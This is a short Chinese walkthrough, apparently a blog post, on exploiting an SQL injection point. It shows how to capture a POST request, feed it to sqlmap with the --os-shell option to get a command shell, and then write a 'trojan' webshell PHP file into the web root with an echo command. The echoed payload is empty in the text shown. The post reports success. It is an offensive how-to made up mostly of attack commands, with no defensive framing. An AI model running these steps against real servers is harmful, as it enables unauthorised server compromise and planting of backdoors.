对存在SQL注入处抓包,查看报错暴露出绝对路径
将POST包放入TXT文本中
启动sqlmap 读取TXT文件
python sqlmap.py -r C:\Users\南倾\Desktop\222.txt --os-shell
写入木马到文件中
echo "" > c:\appserv\www\phptest2\666.php
成功
京公网安备 11010502049817号